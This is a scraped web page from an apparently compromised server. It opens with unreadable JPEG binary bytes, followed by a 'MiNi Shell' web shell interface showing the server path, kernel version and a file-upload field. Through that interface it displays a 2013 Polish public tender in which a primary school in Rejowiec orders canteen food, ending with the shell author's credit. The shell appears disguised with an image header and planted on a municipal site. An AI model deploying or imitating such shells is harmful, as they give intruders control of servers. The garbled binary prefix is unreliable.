JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130812/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130812/160377-N-2013.html

<p class="kh_header"><b>Rejowiec: Dostawa artykułów spożywczych w roku szkolnym 2013/2014</b><br>
<b>Numer ogłoszenia: 160377 - 2013; data zamieszczenia: 12.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa im. M.Reja w Rejowcu , ul. Stanisława Zwierzyńskiego 8A, 22-360 Rejowiec, woj. lubelskie, tel. 82 56 88 612.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Budżetowa Jednostki Samorządu Terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych w roku szkolnym 2013/2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów spożywczych dla potrzeb stołówki Szkoły Podstawowej im. M. Reja w Rejowcu. Zamówienie zostało podzielone na 7 części: Część I Pieczywo; Część II Produkty mleczarskie; Część III Mięso i produkty mięsne Część IV Warzywa, owoce, kiszonki; Część V Różne produkty spożywcze; Część VI Mrożonki; Część VII Artykuły garmażeryjne..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.00.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) oferta sporządzona według załączonego do SIWZ formularza  nr 1,
2) wypełniony formularz asortymentowo - cenowy zgodnie ze wzorem stanowiącym rozdział IV SIWZ,
3) zaakceptowany projekt umowy w sprawie zamówienia publicznego, stanowiący rozdział III SIWZ,
4)  w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - pełnomocnictwo osoby reprezentującej wspólnie działających Wykonawców, określające postępowanie, do którego się odnosi oraz określające osobę pełnomocnika i Wykonawców udzielających pełnomocnictwa. Pełnomocnictwo powinno być podpisane przez wszystkich Wykonawców. Niniejszy punkt dotyczy również wspólników spółki cywilnej,
5) informacja o ewentualnych podwykonawcach wg formularza nr 3
6) nakaz płatniczy (dotyczy rolników),
7) oświadczenie o równoważności produktów wraz z opisem - w przypadku składania ofert równoważnych.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugrejowiec.bip.e-zeto.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Podstawowa im. M. Reja w Rejowcu
ul. Zwierzyńskiego 8a   22-360 Rejowiec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.09.2013 godzina 09:00, miejsce: Szkoła Podstawowa im. M. Reja w Rejowcu
ul. Zwierzyńskiego 8a  22-360 Rejowiec
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PIECZYWO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb pszenny 0,55 kg Baltonowski lub równoważny 	2032 szt.
Chleb razowy 0,40 kg 	970 szt.
Bułka zwykła długa 0,30 kg	197 szt.
Bułka tarta 	180,50 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PRODUKTY MLECZARSKIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Śmietana 22% 1kg	477 szt.
Śmietana 18% 400ml	1127 szt.
Masło roślinne 500 g RM lub równoważne	226 szt.
Masło roślinne 250 g RM lub równoważne	54 szt.
Twaróg półtłusty 	139 kg
Jogurt (smaki różne) 150g	4984 szt.
Mleko 2% 1L	55 szt.
Twarożek tłusty sernikowy 1kg	10 szt.
Margaryna zwykła 250g Kasia lub równoważna	124 szt.
Masło śmietankowe 200g Nadbużańskie lub równoważne	97 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> MIĘSO I PRODUKTY MIĘSNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mięso wieprzowe b/kości - schab	417,47 kg
Mięso wieprzowe b/kości - szynka	513,92 kg
Mięso wieprzowe b/kości - karkówka	157,30 kg
Mięso wieprzowe b/kości - łopatka 	147,20 kg
Żeberka  	60,19 kg
Kurczak	126,61 kg
Ćwiartka z kurczaka 	8,78 kg
Skrzydełka	8,78 kg
Porcja rosołowa	8,78 kg
Filet z kurczaka 	526,59 kg
Konserwy wieprzowe/wołowe 300g Łuków/Sokołów lub równoważne 	41 szt.
Konserwy wieprzowe/wołowe 500g Łuków/Sokołów lub równoważne 	
Smalec	21 kg
Kiełbasa podwawelska Sokołów lub równoważne 	18,11 kg
Mięso mielone wieprzowo - wołowe mrożone 	127,50 kg
Boczek	 30 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2, 15.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> WARZYWA OWOCE KISZONKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Koper 	23 szt. pęczek
Kapusta czerwona 	10 kg
Pietruszka	8,50 kg
Szczypiorek	106 szt. pęczek
Seler	88,33 kg
Ogórek świeży 	280 kg
Papryka	12,57 kg
Kalarepa	50 szt.
Burak ćwikłowy	307,20 kg
Kalafior średnia wielkość do 50 dkg	8 szt.
Kapusta biała	67,10 kg
Kapusta młoda średnia wielkość do 1 kg	13 szt.
Kapusta pekińska średnia wielkość do 50 dkg	100 szt.
Kapusta kiszona	450 kg
Fasola szparagowa	15 kg
Fasola Jaś	40 kg
Cebula	27,72 kg
Pieczarka	 49,60 kg
Pomidor	40,14 kg
Marchewka	532,14 kg
Ogórek kiszony	80 kg
Banan	56 kg
Jabłko	140 kg
Mandarynka	100 kg
Truskawka	32 kg
Malina	10 kg
Wiśnia	10 kg
Czereśnia	10 kg
Rzepa	75 kg
Ziemniaki  	6945 kg
Śliwki	7 kg
Gruszki	10 kg
Rabarbar	5,5 kg
Pietruszka zielona	25 szt. (pęczek)
Rzodkiewka	172 szt. (pęczek)
Sałata	101 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9, 15.33.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> RÓŻNE PRODUKTY SPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Napój w proszku 1 kg smak: cytryna, pomarańcza, brzoskwinia, malina, jabłko, wiśnia ALSA KNORR lub równoważny	110 szt.
Galaretka w proszku 850g smak: ananas UBENA lub równoważna	20 szt. 
Galaretka w proszku 1300g smak: cytrynowa, pomarańczowa, truskawkowa, wiśniowa, agrestowa WINIARY lub równoważna	137 szt.
Makaron 3 kg KNORR lub równoważny	273 kg
Mąka pszenna 450 g i 500 g LUBELLA POZNAŃSKA lub równoważny	170 kg
Mąka ziemniaczana 500 g 	16 kg
Kasza jęczmienna 5 kg 	80 kg
Kasza gryczana 5 kg 	50 kg
Ryż 5 kg 	111 kg
Przyprawa do drobiu i ryb 600 g DELICAT 
lub równoważna	10 szt.
Przyprawa do mięsa 600g DELICAT lub równoważna	10 szt.
Przyprawa warzywna do potraw 75 g VEGETA 
lub równoważna	708 szt.
Przyprawa w płynie Maggi	5 szt.
Przyprawa ziarenka smaku	31 szt.
Sól jodowana ważona 1 kg	124 kg
Cukier 1 kg	195 kg
Rosół drobiowy w kostce 700 g KNORR lub równoważny 	7 szt
Zupa w proszku 900-1000g: biały barszcz WINIARY lub równoważna 	7 kg
Zupa w proszku 900-1000g: czerwony barszcz WINIARY lub równoważna 	7 kg
Zupa w proszku 900-1000g: ogonowa WINIARY lub równoważna	5 kg
Zupa w proszku 900-1000g: pieczarkowa WINIARY lub równoważna 	6 kg
Zupa w proszku 900-1000g: grzybowa WINIARY lub równoważna 	9 kg
Sos  w proszku 1010g: pieczeniowy, grzybowy, boloneze KNORR lub równoważny 	6 kg
Koncentrat pomidorowy 800g KNORR lub równoważny 	21 szt.
Koncentrat pomidorowy 950g PUDLISZKI lub równoważny 	10 szt.
Koncentrat pomidorowy 200g PUDLISZKI lub równoważny 	30 szt.
Chrzan w słoiczku 300g RĘBEK lub równoważny	34 szt.
Chrzan w słoiczku 200g RĘBEK lub równoważny 	6 szt.
Szczaw w słoiczku 300g RĘBEK lub równoważny	32 szt.
Majonez 3 kg WINIARY lub równoważny	23 szt.
Majonez 700 ml WINIARY lub równoważny	10 szt.
Majonez 400 ml WINIARY lub równoważny	7 szt.
Jajka kurze klasa wagowa L warunki chowu kury 0-1	6000 szt.
Ogórek konserwowy 2600 g 	117 szt.
Ogórek konserwowy 0,9 l	13 szt.
Kukurydza konserwowa 2650g PUDLISZKI lub równoważna	14 szt.
Kukurydza konserwowa 680g PUDLISZKI lub równoważna	19 szt. 
Groszek konserwowy 2600g PUDLISZKI lub równoważna	7 szt. 
Pietruszka suszona  150g	6 szt.
Majeranek 150g	4 szt.
Liść laurowy 6g	54 szt.
Ziele angielskie całe 600g	10 szt.
Pieprz mielony czarny 2g	55 szt.
Pieprz ziołowy 2g	40 szt.
Kwasek cytrynowy 50g	41 szt.
Cukier waniliowy 16g	48 szt.
Cukier waniliowy 32g	48 szt.
Rodzynki 100g	50 szt.
Brzoskwinie w syropie w puszce 600g	20 szt.
Sos śmietanowo - ziołowy 30g Pomysł na kurczaka lub równoważny	159 szt.
Oliwa z oliwek 1 l	11 szt.
Olej rzepakowy 5 l 	81 szt.
Olej rzepakowy 1 l 	36 szt.
Olej rzepakowy 3 l 	2 szt.
Syrop sok o ekstracie ogólnym nie mniejszym niż 65% 420 ml smak: kiwi, pomarańcza, brzoskwinia, wiśnia, malina, truskawka, cytryna Herbapol lub syrop sok 490 ml smak: pomarańcza, brzoskwinia, wiśnia, malina, truskawka, cytryna Cymes lub równoważny	409 szt.
Woda mineralna gazowana 1,5	9 szt.
Paluszki solone 80g Lubella lub równoważne	405 szt.
Wafelek Princessa 37g lub równoważny	405 szt.
Herbatniki Petitki LU lub równoważny	405 szt.
Jabłka smażone w słoiku 1l	3 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.82.00.00-2, 15.83.00.00-5, 15.84.00.00-8, 15.85.00.00-1, 15.87.00.00-7, 15.89.00.00-3, 15.32.00.00-7, 15.40.00.00-2, 15.33.20.00-4, 15.33.10.00-7, 15.61.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> MROŻONKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ryba mrożona filet Sola lub Limanda	484,57 kg
Ryba mrożona kostka 	100 kg
Owoce mrożone pięcioskładnikowa mieszanka kompotowa 2,5 kg	50 kg
Owoce mrożone siedmioskładnikowa mieszanka kompotowa 2,5 kg	10 kg
Truskawka mrożona 2,5 kg	30 kg
Śliwki mrożone 450g	14 kg
Malina mrożona 2,5 kg	5 kg
Zupa pieczarkowa mrożona 450g	59 kg
Zupa grzybowa mrożona 450g	94 kg
Barszcz czerwony mrożony 450g	33 kg
Kalafior mrożony 2,5 kg	48 kg
Brokuł mrożony 2,5 kg	45 kg
Fasolka szparagowa mrożona 2,5 kg	175 kg
Marchewka z groszkiem mrożona 2,5 kg	197,50 kg
Marchewka mrożona kostka 2,5 kg	10 kg
Groszek zielony mrożony  2,5 kg	10 kg
Wiśnie mrożone 450g 	32 kg
Jagody mrożone 2,5 kg	5 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.30.00-0, 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> ARTYKUŁY GARMAŻERYJNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pierogi z ziemniakami i serem	776 kg
Kluski śląskie 	343 kg
Gołąbki z mięsem	280 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.40</li>
<li>2. Jakość - 0.60</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com